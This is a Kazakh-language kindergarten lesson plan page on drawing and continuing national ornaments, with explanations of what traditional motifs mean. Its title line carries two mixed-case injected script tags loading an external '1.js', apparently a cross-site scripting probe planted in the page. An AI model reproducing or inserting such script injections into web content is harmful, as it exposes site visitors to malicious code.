«Еркетай» ересек тобындағы ұйымдастырылған оқу іс-әрекет кезеңі.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.11.2024

Бөлімі: «Сурет салу, мүсіндеу» кіріктірілген іс-әрекет

Міндеті: Суретшінің аяқтамаған  ою-өрнегін  әрі қарай жалғастыру. Балалар түстерді ажырата алады. Суретке қызығушылық танытып суретті жалғастырып бояйды. Қауіпсіздік ережелерін сақтауға, шығармашылық дағдыларын қалыптастыру. Ұлттық құндылықтарды балалардың бойына сіңіруге дағдыланадыру.

         Ұлттық ою-өрнектер өздерінің түрлеріне қарай, әр түрлі мағына береді. Мысалы, бас киімге арналған оюды аяқ астына салынатын текеметке ешқашан қолданбаған. "Су өрнегі", "ирексу" немесе "ирек" түрінде келетін ою – ою арасындағы шекараны білдірген екен. Оюдың бұл түрін әйелдер көбінесе киімнің шет тұстарына, мысалы бас киімнің жиегіне, бешпет, камзолдардың жағалары мен жиектеріне пайдаланған екен. Құстұмсық деп аталатын ою – әділдік пен мейірімділікті білдірген. Жалпы қазақ халқында құс атауымен байланысты оюлардың барлығы ұрпақ жалғасы деген мағынаны білдіреді екен. Сол себепті аққу өрнегі – махаббат символы болса, үкі оюы – сәбидің қорғаушысы, қарлығаш оюы – шаңырақ сақтаушысы саналған. Ал, халық арасында кең таралған қошқармүйіз өрнегі – молшылықтың, тоқшылықтың белгісі саналады. Әсіресе, түркі халықтарында мүйізді жануарлардың барлығы дерлік киелі саналады. Оған дәлел, "Алтын адам" киімінде дәл осы өрнектің көрініс табуы болып отыр. Қазақ қолданбалы өнері үшін ұлттық ою-өрнектердің орны бөлек болмақ. Себебі, онда бір ұлтты өзгелерден ерекшелейтін ұлттық нақыш пен белгі бар. Сондықтан халқымыз үшін қастерлік саналатын ою-өрнектерді атадан балаға мирас етіп, көздің қара шығындай сақтағанымыз абзал.

 

Тәрбиеші: Кусаинова Г.А.

Просмотров: 1530


Пікір қосу



Деректерді қолтаңбаға қосу